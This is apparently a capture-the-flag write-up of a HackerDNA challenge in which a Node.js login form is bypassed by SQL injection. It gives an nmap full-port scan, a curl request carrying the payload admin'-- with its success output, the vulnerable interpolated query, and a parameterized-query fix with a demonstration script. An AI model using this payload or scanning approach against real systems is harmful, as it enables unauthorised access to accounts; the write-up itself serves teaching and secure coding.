Auth Bypass – SQL Injection

How a single quote broke authentication

SQL Injection Auth Bypass HackerDNA

Auth Bypass via SQL Injection

Challenge Summary

A Node.js login portal vulnerable to classic SQL injection, found on a non-standard port after scanning.

Target: 63.32.98.247
Port: 8080 (Node.js)
Tools: nmap, curl, gobuster

Methodology

Step 1: Discovery – Only a static page on port 80. Full port scan revealed port 8080.

nmap -sV -p- --min-rate 5000 63.32.98.247

Step 2: Enumeration – Visiting http://63.32.98.247:8080 showed a login form POSTing to /login.

Step 3: Injection – Classic payload admin'-- bypassed authentication.

Reconnaissance

The challenge page hinted that the real service was elsewhere. An Nmap service scan of all ports found an Express server on port 8080.

Exploitation

Sending a POST request to /login with the SQL injection payload in the username field:

curl -X POST http://63.32.98.247:8080/login -d "username=admin'--&password=anything"
✅ Authentication Successful! Welcome, admin.

Why It Worked

The backend concatenated user input directly into the SQL query string:

// Vulnerable code: username and password are interpolated unescaped into the SQL text
const query = `SELECT * FROM users WHERE username='${username}' AND password='${password}'`;

Entering admin'-- turns the query into:

SELECT * FROM users WHERE username='admin'--' AND password='anything'

The -- starts a SQL line comment, so everything after it (including the AND password=... check) is ignored; the query matches the admin row regardless of the password supplied.

⚠️ OWASP A03:2021 – SQL Injection remains a top risk.

Secure Coding Fix

// Parameterized query – safe
const query = 'SELECT * FROM users WHERE username=? AND password=?';
db.execute(query, [username, password]);
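To make the difference visible without a database, here is an added example (not code from the original write-up or the challenge): it builds the query the vulnerable way and the bound way, then strips "--" comments with a quote-aware scanner to show what the engine would actually evaluate. The bindParams helper is an illustration of how a driver quotes a bound value; a real driver such as the one behind db.execute sends parameters separately from the SQL text.

```javascript
// The vulnerable pattern from the write-up: raw interpolation into SQL.
function buildVulnerableQuery(username, password) {
  return `SELECT * FROM users WHERE username='${username}' AND password='${password}'`;
}

// Quote a string literal and double embedded quotes so a value can never
// close the literal early. Only used to render the bound query for display.
function quoteLiteral(value) {
  return "'" + String(value).replace(/'/g, "''") + "'";
}

// Client-side rendering of a `?` placeholder query, for illustration only;
// a real driver sends bound values separately from the SQL text.
function bindParams(sql, params) {
  let i = 0;
  return sql.replace(/\?/g, () => quoteLiteral(params[i++]));
}

// Drop a "-- ..." comment the way a SQL lexer would: only outside string
// literals, so "--" inside a properly quoted value is kept as data.
function effectiveSql(sql) {
  let out = '';
  let inString = false;
  for (let i = 0; i < sql.length; i++) {
    const ch = sql[i];
    if (inString) {
      out += ch;
      if (ch === "'") {
        if (sql[i + 1] === "'") { out += "'"; i++; } // escaped quote ''
        else inString = false;
      }
    } else if (ch === "'") {
      inString = true;
      out += ch;
    } else if (ch === '-' && sql[i + 1] === '-') {
      break; // everything to end of line is a comment
    } else {
      out += ch;
    }
  }
  return out.trim();
}

const payload = "admin'--"; // the payload used in the write-up
const vulnerableQuery = buildVulnerableQuery(payload, 'anything');
const boundQuery = bindParams('SELECT * FROM users WHERE username=? AND password=?', [payload, 'anything']);
console.log(effectiveSql(vulnerableQuery)); // password check is gone
console.log(effectiveSql(boundQuery));      // statement intact, payload is plain data
```

Binding stops the injection but does not make comparing a plaintext password inside SQL a good design; in practice fetch the row by username and verify a password hash in application code.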

Key Takeaways

🔍 Scan all ports – services hide on non-standard ports.
💉 Always test login fields for SQLi first.
🛡️ Use parameterized queries / ORM to prevent injection.
📚 Understand the SQL syntax to craft better payloads.